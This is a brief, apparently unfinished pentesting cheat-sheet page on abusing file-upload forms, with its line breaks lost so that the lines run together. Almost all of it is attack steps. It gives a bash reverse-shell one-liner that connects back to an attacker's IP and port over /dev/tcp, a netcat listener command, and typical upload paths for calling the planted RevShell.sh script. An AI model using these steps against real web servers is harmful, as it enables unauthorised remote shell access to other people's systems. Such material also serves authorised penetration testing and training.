Abuse File Upload (WIP)
http://$url/submit #Example route of the page with the submit option#!/bin/bash
bash -i >& /dev/tcp/$MyIP/$port 0>&1 nc -nvlp $port #Same port that is in the scripthttp://$url/RevShell.sh #Invoke the file
http://$url/uploads/RevShell.sh #Common route for uploaded files
http://$url/_uploaded/RevShell.sh #Another common route for uploaded filesFile Type Filter Bypass
Last updated